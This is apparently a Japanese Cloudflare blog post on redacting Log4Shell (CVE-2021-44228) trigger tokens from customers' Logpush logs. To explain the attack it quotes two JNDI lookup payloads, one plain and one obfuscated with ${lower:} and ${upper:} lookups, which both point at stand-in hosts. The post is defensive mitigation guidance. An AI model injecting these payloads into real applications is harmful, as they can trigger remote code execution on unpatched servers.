Subscribe to receive notifications of new posts:

Log4jの脆弱性からお客様を守るためのCloudflareログのサニタイジング

12/14/2021

1 min read

2021年12月9日、Apache Log4jユーティリティに影響を与えるゼロデイエクスプロイトCVE-2021-44228について世界中に知れ渡りましたCloudflareは直ちにWAFを更新し、この脆弱性から保護するようにしましたが、お客様にはできるだけ早くシステムを更新することをお勧めします。

しかし、多くのCloudflareのお客様がLog4jを使用するソフトウェアを使ってログを消費していることを知っているので、Cloudflare Logs経由で試みられる不正利用未遂も削減しています。この記事の執筆時点で、送信済みのログには毎秒最大1000回の悪用パターンが確認されています。

本脆弱性を誘発する可能性のあるトークンを自動的に削除するよう、Logpush ジョブを直ちに更新することができます。この件に関する詳細は、developer docs または下記をご参照ください。

攻撃の仕組み

Log4jの脆弱性の仕組みについては、こちらのブログ記事をご覧ください。要するに、攻撃者は  ${jndi:ldap://example.com/a} のようなものを追加することができるわけです。任意の文字列で、Log4jは、このオブジェクトを取得するために、インターネット上で接続を行います。

Cloudflare Logsには、User AgentやURLパスなど、公衆インターネット上のエンドユーザーが制御可能な文字列フィールドが多数含まれています。本脆弱性により、悪意のあるユーザーが、これらのフィールドを読み取り、パッチが適用されていない Log4j のインスタンスを使用するシステムにおいて、リモートでコードを実行する可能性があります。

当社のミティゲーションプラン

残念ながら、${jndi:ldapのようなトークンをチェックするだけでは、この脆弱性から保護するには十分ではありません。テンプレート言語の表現力の高さから、難読化された亜種もチェックする必要があるのです。すでに、実働環境の攻撃者が  ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} のようなバリエーションを使用していることが確認されています。したがって、トークン${をリダクティングすることが、この脆弱性を防御する最も一般的な方法です。

トークン ${は現在、弊社がお客様に送信しているログに、1秒間に最大1,000回出現しています。いくつかの記録を抜き取り検査したところ、その多くがこの脆弱性を悪用しようとする試み ではないこととがわかりました。したがって、このトークンがログに表示されることを期待しているお客様に影響を与えることなく、安全にログを再編集することはできません。

今より、お客様は Logpush ジョブを更新して、文字列  ${を再編集し、x{に置き換えることができるようになります。

これを有効にするには、Logpush のジョブオプション設定を更新して、パラメータ CVE-2021-44228=true を含めることができます。Logpush API を使用したこの方法の詳細な手順については、弊社開発者向けドキュメントの例をご参照ください。このオプションは現在Cloudflareダッシュボードでは利用できず、APIを利用してのみ変更可能であることに注意してください。

Twitterでつぶやく Hacker Newsで話し合う Redditで話し合う

ログ 脆弱性 ゼロデイ脅威 セキュリティ Log4J

Twitterでフォロー

Jon Levine | @jplevine

Cloudflare | Cloudflare

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you're looking for a new career direction, check out our open positions.
Log4J (JP)Log4Shell (JP)Vulnerabilities (JP)日本語

Follow on X

Jon Levine|@jplevine
Cloudflare|@cloudflare

Related posts

December 10, 2021 11:39 PM

Log4j 2の脆弱性に対する Cloudflare のセキュリティ対応について

Cloudflare では、新しいセキュリティの脆弱性を確認した場合、すぐにチームを集めて次の2つの異なる質問に答えます。(1) お客様のインフラを確実に保護するために何ができるか、(2) 自社の環境を確実に保護するために何ができるか。昨日(2021年12月9日)...

December 10, 2021 9:18 PM

Log4j2の脆弱性(CVE-2021-44228)について

昨日(2021年12月9日)、一般的なJavaベースのロギングパッケージである Log4j に非常に深刻な脆弱性があることが公表されました。この脆弱性により、攻撃者はリモートサーバー上でコードを実行することができます。いわゆるリモートコード実行(RCE)です。JavaとLog4jは広く使われているため、これは Heartbleed や ShellShock以来、インターネット上で最も深刻な脆弱性の一つと考えられます。...